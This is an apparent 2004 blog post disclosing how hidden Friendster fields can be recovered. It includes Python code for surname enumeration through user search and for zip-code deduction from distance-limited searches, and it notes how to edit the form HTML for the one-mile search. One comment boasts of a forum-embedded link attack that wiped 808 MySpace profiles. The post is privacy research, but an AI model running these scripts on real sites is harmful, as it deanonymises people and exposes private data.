10.02.04

Hacking Social Networks part II (Don't search private data)

This installment of Hacking Social Networks is about search and private data. The point we want to make is that public searches should never be allowed to return results based on private data. To be clear, we do not mean results that explicitly include private data, but results that, while containing only public data, are constrained by private data: if a search can be narrowed by a field the site hides, that field can be recovered one query at a time. Let's take three pieces of private data on Friendster: last name, zip code, and email address, and consider how each can be abused or discovered.

Last names in many social networks, including Friendster, are considered private data. To find the last name of someone on Friendster we will use the user search feature. User search lets you search for people by first and last name. The user's profile reveals their first name and their user id (in the URL). To abuse the user search, enter the user's first name, guess a last name, and check whether any of the returned users carry the user id we are interested in. This approach is reasonable because the distribution of last names is far from even; it is in fact so uneven that one out of every one hundred people in the US has the last name Smith. The US Census Bureau provides the frequency data. From it we see that after trying only twenty-eight last names, in descending order of frequency, we have a ten percent chance of having guessed the user's last name. As we go down the list the probability added by each new name decreases, so we have to try more and more names to raise our chance of a match: the 115th name gets us to twenty percent, the 315th to thirty percent, the 771st to forty percent, and so on. Clearly, this is too much to do by hand but not too much for a program. Most last names can be discovered from Friendster profiles this way.
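Here is the enumeration loop as a worked example. This is added code, not anything from the original post or from Friendster: the site's user search is replaced by a stand-in over a constructed directory (`fake_search`, `FAKE_DIRECTORY`), and the surname shares in `SURNAME_SHARES` are approximate illustrative figures, not the Census file. It shows both halves of the argument: how many guesses a given hit rate costs, and the search-and-compare loop that stops as soon as the known user id turns up.

```python
"""Surname enumeration against a first-name/last-name user search.

Added example, not code from the original post. The search feature is
modelled by a stand-in function over a constructed directory, and the
surname shares are approximate illustrative figures, not the Census file.
"""
from typing import Callable, Iterable, List, Optional, Sequence, Tuple

# Constructed, approximate table of (surname, share of US population),
# roughly in the order the Census Bureau's surname list gives. A real run
# would load the full Census file; only the ordering matters to the attack.
SURNAME_SHARES: List[Tuple[str, float]] = [
    ("SMITH", 0.01006), ("JOHNSON", 0.00810), ("WILLIAMS", 0.00699),
    ("JONES", 0.00621), ("BROWN", 0.00621), ("DAVIS", 0.00480),
    ("MILLER", 0.00424), ("WILSON", 0.00339), ("MOORE", 0.00312),
    ("TAYLOR", 0.00311),
]

# search(first_name, last_name) -> iterable of (user_id, first_name)
SearchFn = Callable[[str, str], Iterable[Tuple[str, str]]]


def by_frequency(shares: Sequence[Tuple[str, float]]) -> List[str]:
    """Surnames ordered from most to least common: the order to guess in."""
    return [name for name, _ in sorted(shares, key=lambda t: t[1], reverse=True)]


def names_needed(shares: Sequence[Tuple[str, float]], target: float) -> Optional[int]:
    """How many surnames, tried in frequency order, it takes before the
    cumulative share (the chance of having already hit the right name)
    reaches `target`. None if the table runs out first."""
    total = 0.0
    ordered = sorted(shares, key=lambda t: t[1], reverse=True)
    for i, (_, share) in enumerate(ordered, start=1):
        total += share
        if total >= target:
            return i
    return None


def guess_last_name(first_name: str, target_uid: str, search: SearchFn,
                    shares: Sequence[Tuple[str, float]]) -> Tuple[Optional[str], int]:
    """Query `search(first, last)` for each surname in frequency order and
    return (surname, queries_made) as soon as the target user id appears in
    the results; (None, queries_made) if the table is exhausted."""
    queries = 0
    for surname in by_frequency(shares):
        queries += 1
        for uid, _ in search(first_name, surname):
            if uid == target_uid:
                return surname, queries
    return None, queries


# Constructed stand-in for the site's user search. The id is what the
# attacker already has from the profile URL; the last name is what the
# site withholds but still matches on.
FAKE_DIRECTORY = {
    "1001": ("Alice", "DAVIS"),
    "1002": ("Alice", "SMITH"),
    "1003": ("Bob", "DAVIS"),
    "1004": ("Alice", "NGUYEN"),
}


def fake_search(first_name: str, last_name: str) -> List[Tuple[str, str]]:
    return [(uid, f) for uid, (f, l) in FAKE_DIRECTORY.items()
            if f.lower() == first_name.lower() and l == last_name.upper()]


if __name__ == "__main__":
    print(names_needed(SURNAME_SHARES, 0.03), "names reach a 3% hit rate")
    print(guess_last_name("Alice", "1001", fake_search, SURNAME_SHARES))
```

Against a real site the only change is swapping `fake_search` for a function that submits the search form and parses user ids out of the result page; the stopping condition stays the same, which is why the search returning only public fields does not help when it is filtered on a private one.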

The second piece of private data we consider is the zip code. Like last names, zip codes are not shown in profiles but are used as part of the Gallery search criteria, which filters by distance from your own zip code. To perform this attack, first retrieve the user id and location from the user's profile. Then get all the zip codes for that location. For each zip code, change your own location to that zip code and perform a Gallery search for the user with the distance set to one mile*. Note which searches returned the user in question. Once all searches have been performed, you can deduce which zip code the user actually resides in using either a zip code map, which can be found in your phone book, or the distances between the zip codes: the user's zip code must lie within a mile of every search location that returned them and farther than a mile from every one that did not.

*To search the Gallery with a distance of one mile you must save the page and edit the distance menu HTML to include 1 as an option.
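The deduction step, as an added worked example rather than code from the original post. It assumes the site's distance filter measures between zip code centroids (an assumption about Friendster, not something the post states), uses constructed centroid coordinates in `ZIP_CENTROIDS` rather than real zip data, and simulates the sweep with `simulate_sweep` instead of hitting the Gallery; `consistent_zips` is the part you would keep, fed with the real set of search zips that did and did not return the user.

```python
"""Narrowing a user's zip code from distance-bounded Gallery searches.

Added example, not code from the original post. The site's distance filter
is assumed to measure between zip code centroids; the centroids below are
constructed points, not real zip code data; the search itself is simulated.
"""
import math
from typing import Dict, Set, Tuple

LatLon = Tuple[float, float]
EARTH_RADIUS_MILES = 3958.8
RADIUS_MILES = 1.0  # the one-mile distance the footnote edits into the form

# Constructed centroids laid out around a target ("10001") so that three
# neighbours fall inside one mile of it and the rest fall well outside.
ZIP_CENTROIDS: Dict[str, LatLon] = {
    "10001": (40.0000, -74.0000),
    "10002": (40.0100, -74.0000),
    "10003": (40.0050, -74.0120),
    "10004": (40.0000, -73.9700),
    "10005": (39.9800, -74.0000),
    "10006": (40.0200, -74.0000),
    "10007": (39.9920, -73.9900),
}


def haversine_miles(p: LatLon, q: LatLon) -> float:
    """Great-circle distance between two (lat, lon) points in miles."""
    lat1, lon1 = map(math.radians, p)
    lat2, lon2 = map(math.radians, q)
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * EARTH_RADIUS_MILES * math.asin(math.sqrt(h))


def simulate_sweep(centroids: Dict[str, LatLon], true_zip: str,
                   radius: float = RADIUS_MILES) -> Tuple[Set[str], Set[str]]:
    """Stand-in for the attacker's sweep: for each zip code in the city, set
    our own location to it, search within `radius`, and record whether the
    target (who really lives in `true_zip`) came back. Returns the sets of
    search zips that did and did not return the user."""
    home = centroids[true_zip]
    returned = {z for z, loc in centroids.items()
                if haversine_miles(loc, home) <= radius}
    return returned, set(centroids) - returned


def consistent_zips(centroids: Dict[str, LatLon], returned: Set[str],
                    not_returned: Set[str], radius: float = RADIUS_MILES) -> Set[str]:
    """Zip codes the user could live in given the sweep results: within
    `radius` of every search location that returned them and beyond it for
    every search location that did not. More than one answer means the
    sweep was not fine enough to separate neighbouring zip codes."""
    hits: Set[str] = set()
    for cand, loc in centroids.items():
        near_all = all(haversine_miles(loc, centroids[z]) <= radius for z in returned)
        far_from_rest = all(haversine_miles(loc, centroids[z]) > radius for z in not_returned)
        if near_all and far_from_rest:
            hits.add(cand)
    return hits


if __name__ == "__main__":
    hit, miss = simulate_sweep(ZIP_CENTROIDS, "10001")
    print("searches that returned the user:", sorted(hit))
    print("zip codes consistent with that:", consistent_zips(ZIP_CENTROIDS, hit, miss))
```

Both the positive and the negative results carry information: a search that did not return the user rules out every zip code within a mile of the search location, which is what lets the sweep collapse to a single answer rather than a cluster.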

Email addresses are the third piece of data we discuss. There is no easy mapping from user id to email address. Instead we do the opposite: find someone's Friendster account by email address. We have written about this once before, providing an example bookmarklet for finding people on Friendster. Besides the bookmarklet, we also have a program which generates reports of Friendster profiles by monitoring local network traffic. The privacy issue is this: your email address, which most people use as if it were pseudonymous, is no longer pseudonymous. Instead it is tightly coupled with your identity on any social network service you use.

Someone can post a personal ad on craigslist and check the picture and details of all the respondents before writing back. Suddenly, a total stranger knows what you look like, who your friends are, your gender and sexual orientation, what movies you like and how you spend your free time. This increase in transparency isn't evident when you sign up for these services.

Posted by moore at 10.02.04 13:11
Comments

Sweet! I'm responsible for an online group and have been sorting out ways of allowing families to handle some sort of match-making, but safety and privacy is key. This is a very nice object lesson in allowing users to selectively block info and the need for systems to respect the blocks.

Posted by: Scott Moore at 17.02.04 18:15

There is always a delicate balance between usefulness/value and risk. Social networks thrive on the usefulness factor, but they often fail to mention the risk. Thanks for pointing it out and making the details available.

Posted by: G at 20.02.04 01:51

Yes, yes, but what I want to know is how many degrees of separation I am from Orkut himself.

wg

Posted by: Wendy M. Grossman at 27.02.04 09:00

MySpace has a lot of security problems..
Recently there was a way to convert your profile into a band profile, by going to a link that converted it. Just for shits and giggles I thought it would be funny to see how many people I could convert. It started out by sending people a link to the convert page in the mail on MySpace; as long as they were on MySpace, which they were because it was the mail on MySpace, if they clicked the link their profile was converted to a band profile, deleting all their info. So I thought to myself, how could I get this out to the masses? Well, I thought, popup? But where do a lot of people look? The forums. So I made a .swf file that popped up the link and embedded it into the forum topics. Sure enough, seconds later a crapload of people were complaining their profiles were changed. Well, the mods caught on in about 5 minutes, but the damage was done. I did a search on new bands; there were 808. Hmm, yeah, well, they are slowly returning everything to normal, i.e. this does not work anymore, but it was fun while it lasted. Laters -- Tnrub Tsaot..

Posted by: Tnrub Tsaot.. at 07.05.04 01:17

Hi! I was wondering if you came up with a better code to see if someone viewed my profile in Friendster, because the one you provided didn't work.

thanks

Posted by: mixielle at 30.07.04 19:54

In regards to your myspace hack, could you possibly point me in the right direction as to how I would go about finding information to set up a mailing script on my site?

Thanks.

Posted by: Emily at 16.09.04 13:23